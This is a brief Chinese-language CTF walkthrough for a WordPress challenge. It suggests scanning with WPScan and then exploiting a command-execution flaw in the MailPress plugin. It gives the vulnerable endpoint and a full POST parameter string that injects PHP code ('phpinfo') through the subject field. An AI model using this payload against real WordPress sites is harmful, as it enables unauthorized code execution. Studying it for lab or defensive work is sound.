1. 该题使用的是wordpress框架,可以利用WPScan进行扫描
注意:带着token才能扫描出漏洞
WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932
在这里利用mailpress插件的命令执行漏洞,越权执行命令
2. 利用漏洞
http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php
利用hackbar或者burp suite进行post的数据传入
参数:
action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1